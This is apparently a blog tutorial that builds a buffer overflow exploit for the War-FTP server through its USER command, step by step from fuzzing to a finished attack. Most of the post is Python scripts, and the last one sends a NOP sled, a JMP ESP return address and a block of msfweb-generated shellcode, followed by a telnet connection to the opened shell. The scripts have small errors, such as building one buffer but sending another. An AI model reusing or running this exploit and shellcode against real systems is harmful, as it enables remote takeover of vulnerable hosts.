#!/usr/bin/pyton
import socket
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
buffer="\x41"*1000
s.connect(('192.168.43.2',21))
data=s.recv(1024)
print("sendingevildatavia USER command...")
s.send('USER '+buffer+'\r\n')
s.close()
print("Finish")
then run OllyDbg Aplication and open war-ftp.exe
then choose menu debug and run
then open terminal console on the backtrack then make ftp connection using nc
then run fuzzer
when fuzzer run, so war ftp on windows xp will be automatic clossed.
then removed file ftpDaemon.DAT and run WarFTP again and make one new user
then open warFTP from OllyDbg and run the Fuzzer Again.
then make patern create to make data 1000 byte
then edit fuzzer
#!/usr/bin/pyton
import socket
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
#buffer="\x41"*1000
buffer="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9A
b0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac
2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4A
d5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae
7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0A
g1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2A
h3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai
6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak
1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4
Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6A
m7Am8Am9An0An1An2An3An4An5An6An7An8A
n9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1
Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3A
q4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6A
r7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At
0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3
Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6
Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8
Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1
Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az
5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba
8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0
Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd
3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5
Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9
Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B"
nilaiEIP = "\x90" * 485
nilaiEIP+= "\xEF\xBE\xAD\xDE"
s.connect(('192.168.43.2',21))
data=s.recv(1024)
print("sendingevildatavia USER command..")
s.send('USER '+nilaiEIP+'\r\n')
data=s.recv(1024)
s.send('PASS PASSWORD '+'\r\n')
s.close()
print("Finish")
then run ollydbg, warftp and fuzzer again. then look what happens with register on ollydbg
you can look if EIP has been overflowed with fuzzer. then insert value in ESP and EIP with pattern_offset.rb to count how much byte in the begin of pattern until string in the register. then edit fuzzer with insert EIP value into fuzzer
#!/usr/bin/pyton
import socket
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
nilaiEIP="\x90" * 485
nilaiEIP+="\xEF\xBE\xAD\xDE"
s.connect(('192.168.43.2',21))
data=s.recv(1024)
print("sendingevildatavia USER command..")
s.send('USER '+nilaiEIP+'\r\n')
data=s.recv(1024)
s.send('PASS PASSWORD '+'\r\n')
s.close()
print("Finish")
then look in the ollydbg
then edit fuzzer again to write in the ESP
#!/usr/bin/pyton
import socket
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
buffer="\x90" * 45
buffer+="\xEF\xBE\xAD\xDE"
buffer+="\x90" * (493-len(buffer))
buffer+="\xCC" * (1000-len(buffer))
s.connect(('192.168.43.2',21))
data=s.recv(1024)
print("sendingevildatavia USER command..")
s.send('USER '+buffer+'\r\n')
data=s.recv(1024)
s.send('PASS PASSWORD '+'\r\n')
s.close()
print("Finish")
then run ollydbg, war ftp and fuzzer again
then search memory address which have command JMP ESP
then make payload using msfweb :
this resul from generate payload using msfweb:
then insert code payload into fuzzer
#!/usr/bin/pyton
import socket
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
buffer="\x90" * 485
buffer+="\x65\x82\xA5\x7C"
buffer+="\x90" * 32
buffer+="\xb8\xfd\xa8\xf9\x34\xd9\xeb\x29\xc9\xd9\x74\x24\xf4\xb1\x51\x5e"
buffer+="\x31\x46\x12\x03\x46\x12\x83\x13\x54\x1b\xc1\x17\xcf\x37\x67\x0f"
buffer+="\xe9\x37\x87\x30\x6a\x43\x14\xea\x4f\xd8\xa0\xce\x04\xa2\x2f\x56"
buffer+="\x1a\xb4\xbb\xe9\x04\xc1\xe3\xd5\x35\x3e\x52\x9e\x02\x4b\x64\x4e"
buffer+="\x5b\x8b\xfe\x22\x18\xcb\x75\x3d\xe0\x06\x78\x40\x20\x7d\x77\x79"
buffer+="\xf0\xa6\x50\x08\x1d\x2d\xff\xd6\xdc\xd9\x66\x9d\xd3\x56\xec\xfe"
buffer+="\xf7\x69\x19\x03\x24\xe1\x54\x6f\x10\xe9\x07\xac\x69\xca\xac\xb9"
buffer+="\xc9\xdc\xa7\xfd\xc1\x97\xc8\xe1\x74\x2c\x68\x11\xd9\x5b\xe7\x6f"
buffer+="\xeb\x77\xa7\x90\x25\xe1\x1b\x08\xa2\xdd\xa9\xbc\x45\x51\xfc\x63"
buffer+="\xfe\x6a\xd0\xf3\x35\x79\x2d\x38\x9a\x7d\x18\x61\x93\x67\xc3\x1c"
buffer+="\x4e\x6f\x0e\x4b\xfb\x72\xf1\xa3\x93\xab\x04\xb6\xc9\x1b\xe8\xee"
buffer+="\x41\xf7\x45\x5d\x35\xb4\x3a\x22\xea\xc5\x6d\xc2\x64\x2b\xd2\x6c"
buffer+="\x26\xc2\x0b\xe5\xa0\x70\xd1\x75\xf6\x2e\x19\xa3\x92\xc0\xb4\x1e"
buffer+="\x9c\x31\x5e\x04\xcf\x9c\x76\x13\xef\x37\xdb\xce\xf0\x68\xb4\x15"
buffer+="\x47\x0f\x0c\x82\xa7\xd9\xdf\x78\x0c\xb3\x20\x50\x3f\x53\x38\x29"
buffer+="\x86\xdd\x91\x36\xd0\x4b\xe1\x18\xbb\x19\x79\xfe\x2c\xbd\xec\x77"
buffer+="\x49\x2b\xbf\xde\xbb\x60\xb6\x07\xd1\x3c\x40\x25\x17\x7d\xa1\x03"
buffer+="\xa6\x3f\x6b\xad\x15\xec\xe0\xdc\xe0\xd4\xad\x75\xbf\x4d\xc0\x77"
buffer+="\x73\x9b\xdb\xf2\x30\x5b\xf5\xa7\xef\xf1\xab\x06\x41\x9c\x4a\xf9"
buffer+="\x30\x35\x1c\x06\x62\xdd\x33\x21\x86\xd0\x1f\x2e\x5f\x86\x60\x2f"
buffer+="\x57\xa8\x4f\x44\xcf\xaa\xf3\x9e\x94\xad\x22\x4c\xaa\x82\xa3\x0e"
buffer+="\x8c\xc1\x47\xbd\xd3\xd0\x57\x91"
s.connect(('192.168.43.2',21))
data=s.recv(1024)
s.send('USER '+buffer+'\r\n')
data=s.recv(1024)
s.send('PASS PASSWORD '+'\r\n')
s.close()
print("Finish")
then run warFTP but not on the way of ollydbg and Fuzzer again then run tellnet in your terminal console
No comments:
Post a Comment